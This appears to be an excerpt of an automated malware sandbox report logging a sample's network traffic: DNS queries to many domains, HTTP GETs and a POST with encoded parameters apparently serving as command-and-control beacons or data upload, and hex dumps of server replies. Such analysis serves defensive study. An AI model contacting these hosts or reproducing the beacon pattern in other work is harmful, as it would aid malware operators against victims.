        Source: global trafficHTTP traffic detected: GET /hsw0/?jTZPp=uLXyH8QWgplw+01MGt5z7ZtXboPXNqbkC1uKFcneqhr1T/4kMzskxZHx0kzyKUbp4FdXPGelQZ0lXUIJIylJCH/YaybQLXyPxH18cc3uRqVtxx5ALXmeuWDvi0AdBTC67hBeitw=&5L0=2bCPy0 HTTP/1.1Host: www.bade.inkAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: global trafficHTTP traffic detected: GET /d42u/?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo= HTTP/1.1Host: www.futurereadyteaming.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
        Source: global trafficDNS traffic detected: DNS query: www.ilodezu.com
        Source: global trafficDNS traffic detected: DNS query: www.vpachurch.org.uk
        Source: global trafficDNS traffic detected: DNS query: www.shopnaya.fr
        Source: global trafficDNS traffic detected: DNS query: www.dolcegusto-quiz.fun
        Source: global trafficDNS traffic detected: DNS query: www.etrading.cloud
        Source: global trafficDNS traffic detected: DNS query: www.ceo-retreats.co.uk
        Source: global trafficDNS traffic detected: DNS query: www.mavonorm-global.uk
        Source: global trafficDNS traffic detected: DNS query: www.adhdphotography.com
        Source: global trafficDNS traffic detected: DNS query: www.allgiftedmalaysia.com
        Source: global trafficDNS traffic detected: DNS query: www.shortput.top
        Source: global trafficDNS traffic detected: DNS query: www.cuddle-paws.co.uk
        Source: global trafficDNS traffic detected: DNS query: www.home-stroi0m.ru
        Source: global trafficDNS traffic detected: DNS query: www.betopfloor.com
        Source: global trafficDNS traffic detected: DNS query: www.bade.ink
        Source: global trafficDNS traffic detected: DNS query: www.futurereadyteaming.com
        Source: unknownHTTP traffic detected: POST /hx08/ HTTP/1.1Host: www.vpachurch.org.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 210Origin: http://www.vpachurch.org.ukReferer: http://www.vpachurch.org.uk/hx08/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 6a 54 5a 50 70 3d 7a 71 71 36 67 42 70 62 6c 6a 6b 31 39 75 50 72 47 2b 64 55 4e 36 78 6a 74 42 7a 68 39 74 50 6f 59 71 62 38 48 51 43 58 6f 79 30 4c 37 62 6b 48 6e 75 75 41 75 33 4a 5a 50 77 77 2b 4d 45 36 55 41 47 62 30 56 6a 45 52 38 56 50 68 77 4d 4b 6c 51 65 30 36 69 37 30 33 63 2b 50 6d 76 46 79 53 75 55 45 52 64 64 6a 68 7a 30 33 43 6a 50 38 34 42 6b 4d 7a 4e 32 61 6c 4d 2b 79 4d 37 4f 72 4d 47 66 71 51 58 46 42 65 52 58 64 73 4b 45 43 49 65 49 5a 7a 75 48 68 76 30 49 6c 7a 44 67 63 70 32 76 6a 73 58 76 62 37 6a 31 67 35 39 68 6f 56 6a 6c 6c 4e 52 57 48 64 64 41 2f 49 54 71 4d 4f 47 52 58 64 71 65 4d 6d 35 36 6a 69 Data Ascii: jTZPp=zqq6gBpbljk19uPrG+dUN6xjtBzh9tPoYqb8HQCXoy0L7bkHnuuAu3JZPww+ME6UAGb0VjER8VPhwMKlQe06i703c+PmvFySuUERddjhz03CjP84BkMzN2alM+yM7OrMGfqQXFBeRXdsKECIeIZzuHhv0IlzDgcp2vjsXvb7j1g59hoVjllNRWHddA/ITqMOGRXdqeMm56ji
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:27 GMTServer: ApacheContent-Length: 196Content-Type: text/html; charset=iso-8859-1X-Onecom-Cluster-Name: X-Varnish: 247437343Age: 0Via: 1.1 webcache2 (Varnish/trunk)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:29 GMTServer: ApacheContent-Length: 196Content-Type: text/html; charset=iso-8859-1X-Onecom-Cluster-Name: X-Varnish: 275448000Age: 0Via: 1.1 webcache2 (Varnish/trunk)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:32 GMTServer: ApacheContent-Length: 196Content-Type: text/html; charset=iso-8859-1X-Onecom-Cluster-Name: X-Varnish: 229319986Age: 0Via: 1.1 webcache2 (Varnish/trunk)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:34 GMTServer: ApacheContent-Length: 196Content-Type: text/html; charset=iso-8859-1X-Onecom-Cluster-Name: X-Varnish: 273023697Age: 0Via: 1.1 webcache2 (Varnish/trunk)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:40 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10723Content-Type: text/html; charset=UTF-8Data Raw: 13 32 df 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f eb e7 eb 86 9c da 22 05 0c 68 b5 54 b9 4b 3a 4b 66 d9 d2 be ad c9 c9 c1 12 b6 d5 ca 42 0f f0 36 1a fd 9f bf ec 33 1c 58 c6 90 20 da 10 78 be 34 d1 6e 90 23 86 e3 7b 6f 55 fd 5f af 9f 7a cf 6b c1 ba 35 70 4e 6b 34 f6 91 3e 4a 03 bb 5c 75 0b de eb d7 af 5b 3c c8 66 cd 2c 01 66 81 11 93 c4 49 dc 32 b6 81 83 c4 41 4a 41 14 38 f6 63 98 d6 ec bf 76 fb 0d 22 a2 02 a2 36 ed bd 86 da f1 63 a5 dd 09 22 8e 24 0a 48 db 37 19 cb 92 3e bf bd cf c2 04 05 93 c8 26 78 bb 26 87 d5 ba f7 55 25 09 fa 62 66 ef 1e 43 75 f6 de 78 3e 2a c6 0e 12 1f 23 60 74 1d 70 0d 98 74 76 85 74 bf c0 c1 3e cc a2 90 ed 13 15 2a 76 b9 97 18 2e 6b 4a 01 d1 42 c7 a0 68 ab d2 1d 23 90 5b 2a dd 46 25 70 99 4f c9 a2 f4 27 dc e2 65 7a 71 50 97 63 60 8c d2 21 97 49 91 cf 64 11 99 f2 0b ec 9b 85 de 78 60 97 86 ba 3b 57 88 12 7e bd 02 9f 8c c3 9d dd 3e 78 d3 b5 fd 37 d8 e6 74 d5 a2 e9 1d ca eb d8 6a 5f ef 17 47 6c f8 4c cb e5 41 9d 4c 6f ec 81 f2 6a 27 3b 7e 4b 49 c5 ad 80 b8 99 d4 95 b8 74 c9 55 41 43 0a 2d 72 3f f8 5e eb 06 25 38 83 f6 de 0f f2 c8 91 ac 5e d6 8b 7f 35 4b 94 b8 10 af 3d 71 54 c8 4a 63 91 23 0e 4b 33 b6 0e aa d9 b7 f6 72 1e f4 c1 7c 6d 1f b5 f7 6d bf 73 50 c1 88 ea e5 ae cf b6 d3 06 6f eb 8a a7 e5 d3 d2 b1 f3 72 9d 91 a7 65 2f d9 d3 b2 69 36 9e 96 08 7e 84 a7 a5 48 18 67 d1 d3 32 93 97 4c 3e 2d 11 41 fa e2 51 81 da c4 fb 01 22 c8 9d 76 38 27 dd 69 f7 b2 d7 9d 76 df fd bb 97 3b 3d c2 1c 6d ad df 66 44 b5 e9 6b e5 a3 8a 34 f0 c9 c1 91 5b 9f 96 e7 81 36 d4 a9 a7 e5 57 17 88 91 53 da e2 53 a6 a1 be fe 49 db 2a 65 09 8b d0 34 95 c1 f2 ee e6 d8 0a b8 66 68 0a 5a 07 cb 8e 52 2a ca 0f d5 0d dc 2d 83 9b 45 3a 7b c3 96 f4 12 e9 20 43 1c d1 e5 be 87 43 1d ea 49 6f af fb 77 f9 6a 6c bf ef f2 49 3b ef 0a 4d a4 7d bd 90 a9 e2 1e 02 fe e8 47 fd fb 36 c4 53 e9 b4 73 ad e9 1f bd b1 6a a7 99 d3 fe c1 eb 43 68 88 9c ad 31 d9 78 60 bb bd 86 1e 63 93 e5 36 8d c7 69 22 61 f3 90 11 4f 5e 43 33 19 f3 1d fc a5 6b 1f 72 c2 89 66 b5 ea 4f ca b1 a6 ad 82 c4 d1 ad be 03 4c 34 db b6 5d f7 49 5f 7c e8 09 27 5c 89 64 be a2 f4 cb 7f 6e 7b 1f c9 f7 d6 aa 6b a8 d9 4e 7b 39 79 c9 1f 95 57 e8 13 b6 00 ef 57 0a 13 5b 85 74 dd a9 1f 08 42 91 52 07 0d cf e4 be bd 7a 67 b7 26 5e 3d fd 6a 40 57 55 65 bf f8 e7 09 33 f9 ae 47 92 d7 6f 1d 7a 3c d6 ca 69 a4 49 c6 50 11 19 50 fd a4 e8 e9 d8 e4 51 fd 74 6c b6 db e8 e9 b8 d5 7c fb 74 94 9c 37 4f 47 99 aa 2c b4 1a 02 7d ee cd 75 e0 b7 37 a2 b8 41 7d 74 b3 55 7f 2f Data Ascii: 2C@E`:{So"hTK:KfB63X x4n#{oU_zk5pNk4>J\u[<f,f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:42 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10723Content-Type: text/html; charset=UTF-8Data Raw: 13 32 df 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f eb e7 eb 86 9c da 22 05 0c 68 b5 54 b9 4b 3a 4b 66 d9 d2 be ad c9 c9 c1 12 b6 d5 ca 42 0f f0 36 1a fd 9f bf ec 33 1c 58 c6 90 20 da 10 78 be 34 d1 6e 90 23 86 e3 7b 6f 55 fd 5f af 9f 7a cf 6b c1 ba 35 70 4e 6b 34 f6 91 3e 4a 03 bb 5c 75 0b de eb d7 af 5b 3c c8 66 cd 2c 01 66 81 11 93 c4 49 dc 32 b6 81 83 c4 41 4a 41 14 38 f6 63 98 d6 ec bf 76 fb 0d 22 a2 02 a2 36 ed bd 86 da f1 63 a5 dd 09 22 8e 24 0a 48 db 37 19 cb 92 3e bf bd cf c2 04 05 93 c8 26 78 bb 26 87 d5 ba f7 55 25 09 fa 62 66 ef 1e 43 75 f6 de 78 3e 2a c6 0e 12 1f 23 60 74 1d 70 0d 98 74 76 85 74 bf c0 c1 3e cc a2 90 ed 13 15 2a 76 b9 97 18 2e 6b 4a 01 d1 42 c7 a0 68 ab d2 1d 23 90 5b 2a dd 46 25 70 99 4f c9 a2 f4 27 dc e2 65 7a 71 50 97 63 60 8c d2 21 97 49 91 cf 64 11 99 f2 0b ec 9b 85 de 78 60 97 86 ba 3b 57 88 12 7e bd 02 9f 8c c3 9d dd 3e 78 d3 b5 fd 37 d8 e6 74 d5 a2 e9 1d ca eb d8 6a 5f ef 17 47 6c f8 4c cb e5 41 9d 4c 6f ec 81 f2 6a 27 3b 7e 4b 49 c5 ad 80 b8 99 d4 95 b8 74 c9 55 41 43 0a 2d 72 3f f8 5e eb 06 25 38 83 f6 de 0f f2 c8 91 ac 5e d6 8b 7f 35 4b 94 b8 10 af 3d 71 54 c8 4a 63 91 23 0e 4b 33 b6 0e aa d9 b7 f6 72 1e f4 c1 7c 6d 1f b5 f7 6d bf 73 50 c1 88 ea e5 ae cf b6 d3 06 6f eb 8a a7 e5 d3 d2 b1 f3 72 9d 91 a7 65 2f d9 d3 b2 69 36 9e 96 08 7e 84 a7 a5 48 18 67 d1 d3 32 93 97 4c 3e 2d 11 41 fa e2 51 81 da c4 fb 01 22 c8 9d 76 38 27 dd 69 f7 b2 d7 9d 76 df fd bb 97 3b 3d c2 1c 6d ad df 66 44 b5 e9 6b e5 a3 8a 34 f0 c9 c1 91 5b 9f 96 e7 81 36 d4 a9 a7 e5 57 17 88 91 53 da e2 53 a6 a1 be fe 49 db 2a 65 09 8b d0 34 95 c1 f2 ee e6 d8 0a b8 66 68 0a 5a 07 cb 8e 52 2a ca 0f d5 0d dc 2d 83 9b 45 3a 7b c3 96 f4 12 e9 20 43 1c d1 e5 be 87 43 1d ea 49 6f af fb 77 f9 6a 6c bf ef f2 49 3b ef 0a 4d a4 7d bd 90 a9 e2 1e 02 fe e8 47 fd fb 36 c4 53 e9 b4 73 ad e9 1f bd b1 6a a7 99 d3 fe c1 eb 43 68 88 9c ad 31 d9 78 60 bb bd 86 1e 63 93 e5 36 8d c7 69 22 61 f3 90 11 4f 5e 43 33 19 f3 1d fc a5 6b 1f 72 c2 89 66 b5 ea 4f ca b1 a6 ad 82 c4 d1 ad be 03 4c 34 db b6 5d f7 49 5f 7c e8 09 27 5c 89 64 be a2 f4 cb 7f 6e 7b 1f c9 f7 d6 aa 6b a8 d9 4e 7b 39 79 c9 1f 95 57 e8 13 b6 00 ef 57 0a 13 5b 85 74 dd a9 1f 08 42 91 52 07 0d cf e4 be bd 7a 67 b7 26 5e 3d fd 6a 40 57 55 65 bf f8 e7 09 33 f9 ae 47 92 d7 6f 1d 7a 3c d6 ca 69 a4 49 c6 50 11 19 50 fd a4 e8 e9 d8 e4 51 fd 74 6c b6 db e8 e9 b8 d5 7c fb 74 94 9c 37 4f 47 99 aa 2c b4 1a 02 7d ee cd 75 e0 b7 37 a2 b8 41 7d 74 b3 55 7f 2f Data Ascii: 2C@E`:{So"hTK:KfB63X x4n#{oU_zk5pNk4>J\u[<f,f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 May 2024 05:16:45 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10723Content-Type: text/html; charset=UTF-8Data Raw: 13 32 df 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f eb e7 eb 86 9c da 22 05 0c 68 b5 54 b9 4b 3a 4b 66 d9 d2 be ad c9 c9 c1 12 b6 d5 ca 42 0f f0 36 1a fd 9f bf ec 33 1c 58 c6 90 20 da 10 78 be 34 d1 6e 90 23 86 e3 7b 6f 55 fd 5f af 9f 7a cf 6b c1 ba 35 70 4e 6b 34 f6 91 3e 4a 03 bb 5c 75 0b de eb d7 af 5b 3c c8 66 cd 2c 01 66 81 11 93 c4 49 dc 32 b6 81 83 c4 41 4a 41 14 38 f6 63 98 d6 ec bf 76 fb 0d 22 a2 02 a2 36 ed bd 86 da f1 63 a5 dd 09 22 8e 24 0a 48 db 37 19 cb 92 3e bf bd cf c2 04 05 93 c8 26 78 bb 26 87 d5 ba f7 55 25 09 fa 62 66 ef 1e 43 75 f6 de 78 3e 2a c6 0e 12 1f 23 60 74 1d 70 0d 98 74 76 85 74 bf c0 c1 3e cc a2 90 ed 13 15 2a 76 b9 97 18 2e 6b 4a 01 d1 42 c7 a0 68 ab d2 1d 23 90 5b 2a dd 46 25 70 99 4f c9 a2 f4 27 dc e2 65 7a 71 50 97 63 60 8c d2 21 97 49 91 cf 64 11 99 f2 0b ec 9b 85 de 78 60 97 86 ba 3b 57 88 12 7e bd 02 9f 8c c3 9d dd 3e 78 d3 b5 fd 37 d8 e6 74 d5 a2 e9 1d ca eb d8 6a 5f ef 17 47 6c f8 4c cb e5 41 9d 4c 6f ec 81 f2 6a 27 3b 7e 4b 49 c5 ad 80 b8 99 d4 95 b8 74 c9 55 41 43 0a 2d 72 3f f8 5e eb 06 25 38 83 f6 de 0f f2 c8 91 ac 5e d6 8b 7f 35 4b 94 b8 10 af 3d 71 54 c8 4a 63 91 23 0e 4b 33 b6 0e aa d9 b7 f6 72 1e f4 c1 7c 6d 1f b5 f7 6d bf 73 50 c1 88 ea e5 ae cf b6 d3 06 6f eb 8a a7 e5 d3 d2 b1 f3 72 9d 91 a7 65 2f d9 d3 b2 69 36 9e 96 08 7e 84 a7 a5 48 18 67 d1 d3 32 93 97 4c 3e 2d 11 41 fa e2 51 81 da c4 fb 01 22 c8 9d 76 38 27 dd 69 f7 b2 d7 9d 76 df fd bb 97 3b 3d c2 1c 6d ad df 66 44 b5 e9 6b e5 a3 8a 34 f0 c9 c1 91 5b 9f 96 e7 81 36 d4 a9 a7 e5 57 17 88 91 53 da e2 53 a6 a1 be fe 49 db 2a 65 09 8b d0 34 95 c1 f2 ee e6 d8 0a b8 66 68 0a 5a 07 cb 8e 52 2a ca 0f d5 0d dc 2d 83 9b 45 3a 7b c3 96 f4 12 e9 20 43 1c d1 e5 be 87 43 1d ea 49 6f af fb 77 f9 6a 6c bf ef f2 49 3b ef 0a 4d a4 7d bd 90 a9 e2 1e 02 fe e8 47 fd fb 36 c4 53 e9 b4 73 ad e9 1f bd b1 6a a7 99 d3 fe c1 eb 43 68 88 9c ad 31 d9 78 60 bb bd 86 1e 63 93 e5 36 8d c7 69 22 61 f3 90 11 4f 5e 43 33 19 f3 1d fc a5 6b 1f 72 c2 89 66 b5 ea 4f ca b1 a6 ad 82 c4 d1 ad be 03 4c 34 db b6 5d f7 49 5f 7c e8 09 27 5c 89 64 be a2 f4 cb 7f 6e 7b 1f c9 f7 d6 aa 6b a8 d9 4e 7b 39 79 c9 1f 95 57 e8 13 b6 00 ef 57 0a 13 5b 85 74 dd a9 1f 08 42 91 52 07 0d cf e4 be bd 7a 67 b7 26 5e 3d fd 6a 40 57 55 65 bf f8 e7 09 33 f9 ae 47 92 d7 6f 1d 7a 3c d6 ca 69 a4 49 c6 50 11 19 50 fd a4 e8 e9 d8 e4 51 fd 74 6c b6 db e8 e9 b8 d5 7c fb 74 94 9c 37 4f 47 99 aa 2c b4 1a 02 7d ee cd 75 e0 b7 37 a2 b8 41 7d 74 b3 55 7f 2f Data Ascii: 2C@E`:{So"hTK:KfB63X x4n#{oU_zk5pNk4>J\u[<f,f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 72662986-fa05-4e92-a665-bfcf77779ddax-runtime: 0.029467content-length: 18254connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 